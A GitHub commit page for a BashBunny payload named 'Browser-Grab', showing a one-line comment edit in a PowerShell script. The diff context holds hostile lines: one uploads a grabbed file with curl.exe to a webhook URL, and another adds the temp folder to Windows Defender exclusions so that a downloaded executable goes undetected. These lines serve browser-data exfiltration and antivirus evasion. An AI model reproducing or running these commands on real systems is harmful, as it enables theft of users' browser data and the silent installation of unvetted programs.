Skip to content
This repository was archived by the owner on Jan 5, 2025. It is now read-only.

Commit

Permalink
Update b.ps1
Browse files Browse the repository at this point in the history
  • Loading branch information
atomiczsec authored Jan 6, 2023
1 parent 907fe04 commit 4da306f
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion BashBunny/payloads/Browser-Grab/b.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -23,7 +23,7 @@ if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}



# Add C:/ to exlusions so Windows Defender doesnt flag the exe we will download
# Add $env:tmp to exlusions so Windows Defender doesnt flag the exe we will download
Add-MpPreference -ExclusionPath $env:tmp

# Download the exe and save it to temp directory
Expand Down

0 comments on commit 4da306f

Please sign in to comment.